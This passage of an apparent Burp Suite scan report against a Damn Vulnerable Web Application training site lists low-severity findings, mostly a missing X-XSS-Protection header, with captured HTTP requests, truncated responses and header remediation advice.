Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=1
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
15.53. https://pentest-ground.com:4280/vulnerabilities/xss_d/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3b16130fb79125ad39c31a7a5f28589
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
15.54. https://pentest-ground.com:4280/vulnerabilities/xss_r/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=7ad36719161235c3db9c483f4194ef00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:35 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
15.55. https://pentest-ground.com:4280/vulnerabilities/xss_s/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=be26cfa0f1e58ad96599acf4fe963262
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4943
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
16. Browser cross-site scripting filter misconfiguration
Previous
Next
There are 54 instances of this issue:
Issue background
Cross-site scripting (XSS) filters in browsers check if the URL contains possible harmful XSS payloads and if they are reflected in the response page. If such a condition is recognized, the injected code is changed in a way, that it is not executed anymore to prevent a succesful XSS attack. The downside of these filters is, that the browser has no possibility to distinguish between code fragments which were reflected by a vulnerable web application in an XSS attack and these which are already present on the page. In the past, these filters were used by attackers to deactivate JavaScript code on the attacked web page. Sometimes the XSS filters itself are vulnerable in a way, that web applications which were protected properly against XSS attacks became vulnerable under certain conditions.
Remediation background
It is considered as better practice to instruct the browser XSS filter to never render the web page if an XSS attack is detected.
16.1. http://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:14 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
16.2. http://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/robots.txt |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
16.3. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=4e98789ed626867505827d1645104bbf; expires=Tue, 22 Oct 2024 09:38:30 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
16.4. https://pentest-ground.com:4280/README.ar.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.ar.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.ar.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=492559470e1d1532b619f28972a798ef
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:46 GMT
Content-Type: text/markdown
Content-Length: 25027
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "61c3-60aa7c44ac3ca"
Accept-Ranges: bytes
# DAMN VULNERABLE WEB APPLICATION
.... Damn Vulnerable Web Application (DVWA) .... .......... ...... .... ............ .......... .......... .... PHP / MySQL. .......... .............. .... ........
...[SNIP]...
16.5. https://pentest-ground.com:4280/README.es.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.es.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.es.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3d105c12bab570377954ff8fef5161a
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:54 GMT
Content-Type: text/markdown
Content-Length: 21777
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "5511-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: es
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) es una aplicaci..n web hecha en PHP/MySQL que es extremadamente vulnerable. Su principal objetivo es ayudar a profesionales de
...[SNIP]...
16.6. https://pentest-ground.com:4280/README.fa.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fa.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.fa.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f645cd9901dfcd217cc382a83297b7b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:51 GMT
Content-Type: text/markdown
Content-Length: 30612
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "7794-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fa
# ................ ...... .............. ...................
................ ...... .............. ................... (DVWA).. .... ................ ...... .......... .... ................../.......
...[SNIP]...
16.7. https://pentest-ground.com:4280/README.fr.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.fr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8b04c2a5e0f29ba02562bbe4b431aa36
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:50 GMT
Content-Type: text/markdown
Content-Length: 20674
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "50c2-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fr
# Translation / Traduction
Philibert Gentil...@[Philibert-Gentil](https://github.com/Philibert-Gentil)
Vous pouvez me contacter en cas d'erreur de traduction / d'interpr..tation.
- - -
# DAMN VULNE
...[SNIP]...
16.8. https://pentest-ground.com:4280/README.pt.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.pt.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.pt.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3e2bad7ac45eec22b45a259f5624a6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:53 GMT
Content-Type: text/markdown
Content-Length: 21239
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "52f7-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: pt
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) .. um aplicativo web em PHP/MySQL que .. extremamente vulner..vel. Seu principal objetivo .. auxiliar profissionais de seguran
...[SNIP]...
16.9. https://pentest-ground.com:4280/README.tr.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.tr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.tr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6c9595aea1e31eff4f63fb4bdd18a1f3
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:56 GMT
Content-Type: text/markdown
Content-Length: 19838
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "4d7e-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: tr
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA), son derece zafiyetli bir PHP/MySQL web uygulamas..d..r. Temel amac..; g..venlik uzmanlar..na, yeteneklerini ve ara..lar..n..
...[SNIP]...
16.10. https://pentest-ground.com:4280/README.zh.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.zh.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /README.zh.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ebbb7d8c32683657d5128f2d3f90d743
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:48 GMT
Content-Type: text/markdown
Content-Length: 17394
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "43f2-60aa7c44ac3ca"
Accept-Ranges: bytes
# ......
.........@[inVains](https://github.com/inVains) @[songzy12](https://github.com/songzy12) @[cnskis](https://github.com/cnskis)
- - -
# ...... DAMN VULNERABLE WEB APPLICATION...DVWA...
Damn
...[SNIP]...
16.11. https://pentest-ground.com:4280/about.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/about.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /about.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bd4354577682343786a08203c3601069
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
16.12. https://pentest-ground.com:4280/compose.yml
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/compose.yml |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /compose.yml HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4d986ec27a888ace189d8ceaa8016b47
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:00 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
16.13. https://pentest-ground.com:4280/config/config.inc.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/config/config.inc.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /config/config.inc.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=887b5206538ce1e025ee586761a3df33
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
16.14. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/DVWA_v1.3.pdf |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /docs/DVWA_v1.3.pdf HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
